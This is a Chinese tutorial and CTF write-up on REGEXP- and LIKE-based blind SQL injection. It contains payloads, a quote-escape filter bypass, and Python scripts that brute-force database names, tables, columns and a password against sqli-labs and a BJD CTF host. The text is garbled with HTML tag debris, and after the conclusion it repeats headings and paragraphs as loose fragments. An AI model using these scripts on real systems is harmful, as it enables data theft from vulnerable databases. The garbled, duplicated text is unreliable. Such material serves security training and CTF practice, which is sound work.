REGEXP注入与LIKE注入深入解析<\/h1>

0x00 前言<\/h2>
REGEXP注入和LIKE注入是SQL注入中的两种特殊技术，主要用于盲注场景。本文将从原理分析、基本注入方法、盲注实战等方面全面介绍这两种注入技术，并通过实际CTF题目复现加深理解。<\/p>

0x01 REGEXP注入分析<\/h2>

注入原理<\/h3>
REGEXP注入即正则表达式注入，又称盲注值正则表达式攻击。主要应用于盲注场景，原理是通过正则表达式匹配查询结果。<\/p>

基本注入方法<\/h3>

基础语法<\/strong>：<\/li> <\/ol>
select<\/span> (select语句<\/span>) regexp '正则'<\/span> <\/span><\/span><\/code><\/pre> 示例<\/strong>：<\/li> <\/ol> -- 正常查询 <\/span><\/span><\/span><\/span>select<\/span> username from<\/span> users where<\/span> id=<\/span>1<\/span>; <\/span><\/span> <\/span><\/span>-- 正则注入，匹配则返回1，否则返回0 <\/span><\/span><\/span><\/span>select<\/span> (select<\/span> username from<\/span> users where<\/span> id=<\/span>1<\/span>) regexp '^a'<\/span>; <\/span><\/span><\/code><\/pre>^<\/code>表示模式串开头，判断username字段下id=1的数据是否以a开头<\/p> 替代WHERE条件中的=号<\/strong>：<\/li> <\/ol> select<\/span> *<\/span> from<\/span> users where<\/span> password regexp '^ad'<\/span>; <\/span><\/span><\/code><\/pre> 常用正则语句<\/strong>：<\/li> <\/ol> regexp '^[a-z]'<\/span> -- 判断第一个字符是否在a-z中 <\/span><\/span><\/span><\/span>regexp '^r'<\/span> -- 判断第一个字符是否为r <\/span><\/span><\/span><\/span>regexp '^r[a-z]'<\/span> -- 判断第二个字符是否在a-z中 <\/span><\/span><\/span><\/code><\/pre> 联合查询中使用<\/strong>：<\/li> <\/ol> 1<\/span> union<\/span> select<\/span> 1<\/span>,database<\/span>() regexp '^s'<\/span>,3<\/span>--+ <\/span><\/span><\/span><\/code><\/pre>REGEXP盲注实战<\/h3> 以sqli-labs Less-8为例：<\/p> 判断数据库长度<\/strong>：<\/li> <\/ol> ' or (length(database())=8)--+ <\/span><\/span><\/span><\/code><\/pre> 判断数据库名<\/strong>：<\/li> <\/ol> ' or database() regexp '<\/span>^<\/span>s'--+ <\/span><\/span><\/span>'<\/span> or<\/span> database<\/span>() regexp 'y$'<\/span>--+ <\/span><\/span><\/span><\/code><\/pre> 自动化脚本<\/strong>：<\/li> <\/ol> import<\/span> requests <\/span><\/span>import<\/span> string <\/span><\/span> <\/span><\/span>strs =<\/span> string.<\/span>printable <\/span><\/span>url =<\/span> "http:\/\/x.x.x.x:8001\/Less-8\/index.php?id="<\/span> <\/span><\/span> <\/span><\/span>database1 =<\/span> "' or database() regexp '^<\/span>{}<\/span>'--+"<\/span> <\/span><\/span>table1 =<\/span> "' or (select table_name from information_schema.tables where table_schema=database() limit 0,1) regexp '^<\/span>{}<\/span>'--+"<\/span> <\/span><\/span>column1 =<\/span> "' or (select column_name from information_schema.columns where table_name=<\/span>\"<\/span>users<\/span>\"<\/span> and table_schema=database() limit 1,1) regexp '^<\/span>{}<\/span>'--+"<\/span> <\/span><\/span>data1 =<\/span> "' or (select username from users limit 0,1) regexp '^<\/span>{}<\/span>'--+"<\/span> <\/span><\/span> <\/span><\/span>payload =<\/span> database1 <\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>: <\/span><\/span> name =<\/span> ''<\/span> <\/span><\/span> for<\/span> i in<\/span> range(1<\/span>,40<\/span>): <\/span><\/span> char =<\/span> ''<\/span> <\/span><\/span> for<\/span> j in<\/span> strs: <\/span><\/span> payloads =<\/span> payload.<\/span>format(name+<\/span>j) <\/span><\/span> urls =<\/span> url+<\/span>payloads <\/span><\/span> r =<\/span> requests.<\/span>get(urls) <\/span><\/span> if<\/span> "You are in"<\/span> in<\/span> r.<\/span>text: <\/span><\/span> name +=<\/span> j <\/span><\/span> print(j,end=<\/span>''<\/span>) <\/span><\/span> char =<\/span> j <\/span><\/span> break<\/span> <\/span><\/span> if<\/span> char ==<\/span>'#'<\/span>: <\/span><\/span> break<\/span> <\/span><\/span><\/code><\/pre>0x02 LIKE注入分析<\/h2> LIKE匹配原理<\/h3> %<\/code>：匹配任意字符串的零个或多个字符<\/li> _<\/code>：匹配任意单个字符<\/li> <\/ul> 基本注入方法<\/h3> 判断首字符<\/strong>：<\/li> <\/ol> 1<\/span> union<\/span> select<\/span> 1<\/span>,database<\/span>() like<\/span> 's%'<\/span>,3<\/span> --+ <\/span><\/span><\/span><\/code><\/pre> 判断前两个字符<\/strong>：<\/li> <\/ol> 1<\/span> union<\/span> select<\/span> 1<\/span>,database<\/span>() like<\/span> 'se%'<\/span>,3<\/span> --+ <\/span><\/span><\/span><\/code><\/pre> 判断是否包含特定字符串<\/strong>：<\/li> <\/ol> 1<\/span> union<\/span> select<\/span> 1<\/span>,database<\/span>() like<\/span> '%se%'<\/span>,3<\/span> --+ <\/span><\/span><\/span><\/code><\/pre> 判断字符长度<\/strong>：<\/li> <\/ol> 1<\/span> union<\/span> select<\/span> 1<\/span>,database<\/span>() like<\/span> '_____'<\/span>,3<\/span> --+ -- 判断是否为5个字符 <\/span><\/span><\/span><\/span>1<\/span> union<\/span> select<\/span> 1<\/span>,database<\/span>() like<\/span> 's____'<\/span>,3<\/span> --+ -- 判断第一个字符是否为s <\/span><\/span><\/span><\/code><\/pre>LIKE盲注实战<\/h3> 以sqli-labs Less-8为例：<\/p> 判断数据库长度<\/strong>：<\/li> <\/ol> ' or database() like '<\/span>________'--+ <\/span><\/span><\/span><\/code><\/pre> 判断数据库名<\/strong>：<\/li> <\/ol> ' or database() like '<\/span>s%<\/span>'--+ <\/span><\/span><\/span>'<\/span> or<\/span> database<\/span>() like<\/span> 's_______'<\/span>--+ <\/span><\/span><\/span><\/code><\/pre> 自动化脚本<\/strong>：<\/li> <\/ol> import<\/span> requests <\/span><\/span>import<\/span> string <\/span><\/span> <\/span><\/span>strs =<\/span> string.<\/span>printable <\/span><\/span>url =<\/span> "http:\/\/x.x.x.x:8001\/Less-8\/index.php?id="<\/span> <\/span><\/span> <\/span><\/span>database1 =<\/span> "' or database() like '<\/span>{}<\/span>%'--+"<\/span> <\/span><\/span>table1 =<\/span> "' or (select table_name from information_schema.tables where table_schema=database() limit 0,1) like '<\/span>{}<\/span>%'--+"<\/span> <\/span><\/span>column1 =<\/span> "' or (select column_name from information_schema.columns where table_name=<\/span>\"<\/span>users<\/span>\"<\/span> and table_schema=database() limit 1,1) like '<\/span>{}<\/span>%'--+"<\/span> <\/span><\/span>data1 =<\/span> "' or (select username from users limit 0,1) like '<\/span>{}<\/span>%'--+"<\/span> <\/span><\/span> <\/span><\/span>payload =<\/span> database1 <\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>: <\/span><\/span> name =<\/span> ''<\/span> <\/span><\/span> for<\/span> i in<\/span> range(1<\/span>,40<\/span>): <\/span><\/span> char =<\/span> ''<\/span> <\/span><\/span> for<\/span> j in<\/span> strs: <\/span><\/span> payloads =<\/span> payload.<\/span>format(name+<\/span>j) <\/span><\/span> urls =<\/span> url+<\/span>payloads <\/span><\/span> r =<\/span> requests.<\/span>get(urls) <\/span><\/span> if<\/span> "You are in"<\/span> in<\/span> r.<\/span>text: <\/span><\/span> name +=<\/span> j <\/span><\/span> print(j,end=<\/span>''<\/span>) <\/span><\/span> char =<\/span> j <\/span><\/span> break<\/span> <\/span><\/span> if<\/span> char ==<\/span>'#'<\/span>: <\/span><\/span> break<\/span> <\/span><\/span><\/code><\/pre>0x03 REGEXP注入实战（BJD CTF题目复现）<\/h2> 题目分析<\/h3> 过滤情况<\/strong>：<\/p> 单引号、双引号被ban<\/li> union和select被ban<\/li> =和like被ban<\/li> <\/ul> <\/li> 绕过方法<\/strong>：SQL语句逃逸单引号<\/p> 使用反斜线\<\/code>转义单引号<\/li> 示例： -- 原始SQL <\/span><\/span><\/span><\/span>select<\/span> username,password from<\/span> users where<\/span> username=<\/span>'$user'<\/span> and<\/span> password=<\/span>'$pwd'<\/span> <\/span><\/span> <\/span><\/span>-- 输入admin\作为用户名，or 1#作为密码 <\/span><\/span><\/span><\/span>select<\/span> username,password from<\/span> users where<\/span> username=<\/span>'admin\'<\/span> and<\/span> password=<\/span>' or 1#'<\/span> <\/span><\/span><\/code><\/pre>由于单引号被转义，and password=<\/code>成为username的一部分，or 1<\/code>逃逸出来成为注入点<\/li> <\/ul> <\/li> <\/ol> 注入实现<\/h3> 使用REGEXP注入<\/strong>，并添加binary<\/code>关键字区分大小写<\/p> <\/li> 转换为16进制<\/strong>（数据库执行查询时会自动转换为字符串）<\/p> <\/li> 最终脚本<\/strong>：<\/p> <\/li> <\/ol> import<\/span> requests <\/span><\/span>import<\/span> string <\/span><\/span> <\/span><\/span>def<\/span> str2hex<\/span>(string): <\/span><\/span> result =<\/span> ''<\/span> <\/span><\/span> for<\/span> i in<\/span> string: <\/span><\/span> result +=<\/span> hex(ord(i)) <\/span><\/span> result =<\/span> result.<\/span>replace('0x'<\/span>,''<\/span>) <\/span><\/span> return<\/span> '0x'<\/span>+<\/span>result <\/span><\/span> <\/span><\/span>strs =<\/span> string.<\/span>ascii_letters+<\/span>string.<\/span>digits <\/span><\/span>url =<\/span> "http:\/\/3fb55301-c0be-4134-830b-fda52f321221.node3.buuoj.cn\/"<\/span> <\/span><\/span>headers =<\/span> { <\/span><\/span> 'User-Agent'<\/span>:'Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko\/20100101 Firefox\/74.0'<\/span> <\/span><\/span>} <\/span><\/span>payload =<\/span> 'or password regexp binary <\/span>{}<\/span>#'<\/span> <\/span><\/span> <\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>: <\/span><\/span> name =<\/span> ''<\/span> <\/span><\/span> for<\/span> i in<\/span> range(1<\/span>,40<\/span>): <\/span><\/span> for<\/span> j in<\/span> strs: <\/span><\/span> passwd =<\/span> str2hex('^'<\/span>+<\/span>name+<\/span>j) <\/span><\/span> payloads =<\/span> payload.<\/span>format(passwd) <\/span><\/span> postdata=<\/span>{ <\/span><\/span> 'username'<\/span>:'admin<\/span>\\<\/span>'<\/span>, <\/span><\/span> 'password'<\/span>:payloads <\/span><\/span> } <\/span><\/span> r =<\/span> requests.<\/span>post(url,data=<\/span>postdata,headers=<\/span>headers) <\/span><\/span> if<\/span> "BJD need"<\/span> in<\/span> r.<\/span>text: <\/span><\/span> name +=<\/span> j <\/span><\/span> print(j,end=<\/span>''<\/span>) <\/span><\/span> break<\/span> <\/span><\/span><\/code><\/pre>0x04 总结<\/h2> REGEXP注入<\/strong>：<\/p> 适用于盲注场景<\/li> 通过正则表达式匹配查询结果<\/li> 可替代WHERE条件中的=号<\/li> <\/ul> <\/li> LIKE注入<\/strong>：<\/p> 使用%和_通配符进行匹配<\/li> 适用于字符匹配场景<\/li> <\/ul> <\/li> 特殊技巧<\/strong>：<\/p> SQL语句逃逸单引号<\/li> 16进制转换绕过过滤<\/li> binary关键字区分大小写<\/li> <\/ul> <\/li> 防御建议<\/strong>：<\/p> 严格过滤特殊字符<\/li> 使用参数化查询<\/li> 限制数据库用户权限<\/li> <\/ul> <\/li> <\/ol> 通过本文的学习，读者可以全面掌握REGEXP和LIKE注入的原理、方法和实战技巧，在CTF比赛和实际渗透测试中灵活应用。<\/p>

REGEXP注入与LIKE注入深入解析<\/h1>

0x00 前言<\/h2> REGEXP注入和LIKE注入是SQL注入中的两种特殊技术，主要用于盲注场景。本文将从原理分析、基本注入方法、盲注实战等方面全面介绍这两种注入技术，并通过实际CTF题目复现加深理解。<\/p>

0x01 REGEXP注入分析<\/h2>

注入原理<\/h3> REGEXP注入即正则表达式注入，又称盲注值正则表达式攻击。主要应用于盲注场景，原理是通过正则表达式匹配查询结果。<\/p>

0x02 LIKE注入分析<\/h2>

0x03 REGEXP注入实战（BJD CTF题目复现）<\/h2>

0x00 前言<\/h2>
REGEXP注入和LIKE注入是SQL注入中的两种特殊技术，主要用于盲注场景。本文将从原理分析、基本注入方法、盲注实战等方面全面介绍这两种注入技术，并通过实际CTF题目复现加深理解。<\/p>

注入原理<\/h3>
REGEXP注入即正则表达式注入，又称盲注值正则表达式攻击。主要应用于盲注场景，原理是通过正则表达式匹配查询结果。<\/p>